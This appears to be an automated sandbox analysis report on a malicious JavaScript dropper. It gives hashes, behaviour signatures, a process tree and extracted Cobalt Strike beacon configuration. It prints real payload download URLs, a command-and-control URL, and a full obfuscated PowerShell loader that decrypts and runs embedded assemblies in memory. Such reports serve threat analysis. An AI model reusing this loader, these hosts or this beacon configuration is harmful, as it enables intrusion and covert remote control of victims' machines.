Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
11-04-2024 01:35
Static task
static1
Behavioral task
behavioral1
Sample
ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24.js
Resource
win10v2004-20240226-en
General
-
Target
ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24.js
-
Size
718KB
-
MD5
6c0c25445827a1bb55a7b7a53a2173e0
-
SHA1
2e34cc5a0e8d276b5288f4ba493bf36e26d7d51c
-
SHA256
ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24
-
SHA512
fa974a3ff032cacf4072eed7ad4def358fabb8d186b5c9b0b50f85c2fd9b337a9c29c5cda0a853abcce9042f7bce8a8f2b991870e9892f4ba51be8b22166f451
-
SSDEEP
384:CqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbW:5mmmmmmmmmmmmmmmmmmW
Malware Config
Extracted
https://store3.gofile.io/download/direct/e63cd175-a3bf-4fbc-87b6-8c237ace143e/hays_compiled_files.pdf
https://store3.gofile.io/download/direct/55478873-a42c-46f8-b63b-60c5031fa485/vad.cmd
Extracted
cobaltstrike
666
http://samsunguniverse.com:443/wp-content/unsalted-condensed-soups/
-
access_type
512
-
beacon_type
2048
-
dns_idle
6.7372036e+07
-
dns_sleep
8.1297408e+08
-
host
samsunguniverse.com,/wp-content/unsalted-condensed-soups/
-
http_header1
AAAACgAAAF1BY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL2F2aWYsaW1hZ2Uvd2VicCwqLyo7cT0wLjgAAAAKAAAAH0FjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjUAAAAKAAAAIkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZSwgYnIAAAAKAAAAFkNvbm5lY3Rpb246IGtlZXAtYWxpdmUAAAAHAAAAAAAAAA8AAAANAAAAAQAAAAkvc291cC5naWYAAAAMAAAAAAAAAA==
-
http_header2
AAAACgAAAB5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24AAAAKAAAAEUNvbm5lY3Rpb246IGNsb3NlAAAABwAAAAAAAAAPAAAACAAAAAYAAAAOQXV0aGVudGljYXRpb24AAAAHAAAAAQAAAAMAAAACAAAATXsiaW1hZ2VfdXJsIiA6ICJodHRwOi8vbWVtZXNtaXgubmV0L21lZGlhL2NyZWF0ZWQvam9vd2RqLmpwZyIsICJhdXRoZGF0YSIgOiAiAAAAAQAAAAIifQAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_method1
GET
-
http_method2
POST
-
jitter
7680
-
maxdns
235
-
polling_time
60000
-
port_number
443
-
sc_process32
%windir%\syswow64\dfrgui.exe
-
sc_process64
%windir%\sysnative\dfrgui.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCF4otg7PLqPK9DRHSRAWCg2RQ4hXLImgcCXikvdf4N9sFBrpIEQsznrImUwv+9q+7voFNWL8Kh+mkeF+bGKcQCczSXFkKpPYvwwOEQeT8lPfiFAkT/eNHDuZY/xrjA4VMmgBRM3qvPbgi9lCPfOowsx6njNPJIeuQufRDk7p5u5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
3.154317312e+09
-
unknown2
AAAABAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAACwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
uri
/imagedata/
-
user_agent
Mozilla/5.0 (X11; CrOS x86_64 13597.94.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.186 Safari/537.36
-
watermark
666
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Blocklisted process makes network request 2 IoCs
Processes:
wscript.exepowershell.exeflow pid process 3 4660 wscript.exe 10 4728 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 5736 1228 WerFault.exe powershell.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5776 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
powershell.exemsedge.exemsedge.exeidentity_helper.exepowershell.exepowershell.exemsedge.exepid process 4728 powershell.exe 4728 powershell.exe 428 msedge.exe 428 msedge.exe 4904 msedge.exe 4904 msedge.exe 4728 powershell.exe 4728 powershell.exe 4728 powershell.exe 540 identity_helper.exe 540 identity_helper.exe 1228 powershell.exe 1228 powershell.exe 1228 powershell.exe 1800 powershell.exe 1800 powershell.exe 1800 powershell.exe 5220 msedge.exe 5220 msedge.exe 5220 msedge.exe 5220 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4728 powershell.exe Token: SeDebugPrivilege 1228 powershell.exe Token: SeDebugPrivilege 1800 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid process 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe 4904 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
wscript.exepowershell.exemsedge.exedescription pid process target process PID 4660 wrote to memory of 4728 4660 wscript.exe powershell.exe PID 4660 wrote to memory of 4728 4660 wscript.exe powershell.exe PID 4728 wrote to memory of 4904 4728 powershell.exe msedge.exe PID 4728 wrote to memory of 4904 4728 powershell.exe msedge.exe PID 4904 wrote to memory of 4764 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4764 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 1568 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 428 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 428 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe PID 4904 wrote to memory of 4792 4904 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\hays_compiled_files.pdf3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9bdcb46f8,0x7ff9bdcb4708,0x7ff9bdcb47184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=4292 /prefetch:64⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3856 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\command.cmd"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\command.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\command.cmd';$NpTc='ElPDuQePDuQmPDuQePDuQnPDuQtAPDuQtPDuQ'.Replace('PDuQ', ''),'CoXPYZpyXPYZToXPYZ'.Replace('XPYZ', ''),'CrEMSSeaEMSStEMSSeDEMSSecEMSSrEMSSypEMSStoEMSSrEMSS'.Replace('EMSS', ''),'DeBhMIcoBhMImBhMIpreBhMIsBhMIsBhMI'.Replace('BhMI', ''),'MjUaaaijUaanMjUaaodujUaaljUaaejUaa'.Replace('jUaa', ''),'CCTRRhaCTRRnCTRRgCTRReECTRRxteCTRRnsCTRRioCTRRnCTRR'.Replace('CTRR', ''),'ReUTwVaUTwVdUTwVLUTwVinUTwVesUTwV'.Replace('UTwV', ''),'GeAhBRtAhBRCuAhBRrAhBRrAhBRentAhBRPrAhBRocAhBRessAhBR'.Replace('AhBR', ''),'FricxOoicxOmBicxOaseicxO6icxO4icxOSicxOtricxOingicxO'.Replace('icxO', ''),'TpxparapxpansfpxpaopxparmFpxpainpxpaapxpalBpxpalopxpacpxpakpxpa'.Replace('pxpa', ''),'SBHHKpBHHKliBHHKtBHHK'.Replace('BHHK', ''),'EnJJQstJJQsryJJQsPoiJJQsntJJQs'.Replace('JJQs', ''),'LoaFmxRdFmxR'.Replace('FmxR', ''),'InrHcCvrHcCokerHcC'.Replace('rHcC', '');powershell -w hidden;function HrNbd($IYBxP){$sIDrs=[System.Security.Cryptography.Aes]::Create();$sIDrs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$sIDrs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$sIDrs.Key=[System.Convert]::($NpTc[8])('YlLuUQlq2zooTkmMvubkG6nmi6eEQu+hG3qKzUo3LiI=');$sIDrs.IV=[System.Convert]::($NpTc[8])('5WjxBcRpNDZeOHu0UleMXg==');$auMon=$sIDrs.($NpTc[2])();$sLVMy=$auMon.($NpTc[9])($IYBxP,0,$IYBxP.Length);$auMon.Dispose();$sIDrs.Dispose();$sLVMy;}function DWPGe($IYBxP){$eIWUL=New-Object System.IO.MemoryStream(,$IYBxP);$RadhF=New-Object System.IO.MemoryStream;$iIZvs=New-Object System.IO.Compression.GZipStream($eIWUL,[IO.Compression.CompressionMode]::($NpTc[3]));$iIZvs.($NpTc[1])($RadhF);$iIZvs.Dispose();$eIWUL.Dispose();$RadhF.Dispose();$RadhF.ToArray();}$zaBiQ=[System.IO.File]::($NpTc[6])([Console]::Title);$zusSU=DWPGe (HrNbd ([Convert]::($NpTc[8])([System.Linq.Enumerable]::($NpTc[0])($zaBiQ, 5).Substring(2))));$FxKCT=DWPGe (HrNbd ([Convert]::($NpTc[8])([System.Linq.Enumerable]::($NpTc[0])($zaBiQ, 6).Substring(2))));[System.Reflection.Assembly]::($NpTc[12])([byte[]]$FxKCT).($NpTc[11]).($NpTc[13])($null,$null);[System.Reflection.Assembly]::($NpTc[12])([byte[]]$zusSU).($NpTc[11]).($NpTc[13])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 27566⤵
- Program crash
-
C:\Windows\system32\timeout.exetimeout /nobreak /t 15⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1228 -ip 12281⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5e1b45169ebca0dceadb0f45697799d62
SHA1803604277318898e6f5c6fb92270ca83b5609cd5
SHA2564c0224fb7cc26ccf74f5be586f18401db57cce935c767a446659b828a7b5ee60
SHA512357965b8d5cfaf773dbd9b371d7e308d1c86a6c428e542adbfe6bac34a7d2061d0a2f59e84e5b42768930e9b109e9e9f2a87e95cf26b3a69cbff05654ee42b4e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD59ffb5f81e8eccd0963c46cbfea1abc20
SHA1a02a610afd3543de215565bc488a4343bb5c1a59
SHA2563a654b499247e59e34040f3b192a0069e8f3904e2398cbed90e86d981378e8bc
SHA5122d21e18ef3f800e6e43b8cf03639d04510433c04215923f5a96432a8aa361fdda282cd444210150d9dbf8f028825d5bc8a451fd53bd3e0c9528eeb80d6e86597
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD59a58cc9ef5899fc362abe2d35611dbed
SHA1b1e688f44a2db18edc82c45816f13516673bdfb6
SHA25668dbaa0b1e4969d425cd0dceef7b24a55f3492a00a98418ca52ca2e668da9268
SHA5124989bbd467f729f9b0728cc09dd451463b0f191748cd0fa49202f1c92642cb80f73a3ff0bb5af7d4a2df0453369dc817742d43b598fe5b82cf5b357a4837561a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD507864350659c24bf2bd446577c45ebf8
SHA192ce91edc35f9303f19dcc0ffc1ad3451ba5094d
SHA25650efabbef8bc0160b0aefba0123a30fa372a015af43ff67ecb2c6a2632fc32ae
SHA512cbdf2c56335478174b050cb4872fab417fc4a7fbeef091b619b7d1b6eb889224ac58c92b48dbc9bdb598fc159c3a8ff1986c40ea36889899726dafc494ab5d50
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD579b027541db1ad564a21390107c7f886
SHA197f16b655e80f135aa9ead6b064098f4f5b6d9b0
SHA256a065509e00cd89c69be405cbb238d90763623f11aeaee68f7ec6e182601e89df
SHA5129d7f679b853489664ae26ca1e859914f306d4e6d5fdb320e6117cece6d9d6c5c398ee94693e4b4e5985312997b8a2356b24d07749637cd5943b81f0cda052298
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oba5roke.drm.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tempScript.ps1Filesize
1013B
MD52c7158e980eed64c5ff47d7e1af46966
SHA13584bcb349acc947e0a565d39afedc2c670ebcb0
SHA25647946ccee313a6703eb0b46514b81f521ab75d359a2688888f1a8270607ab82d
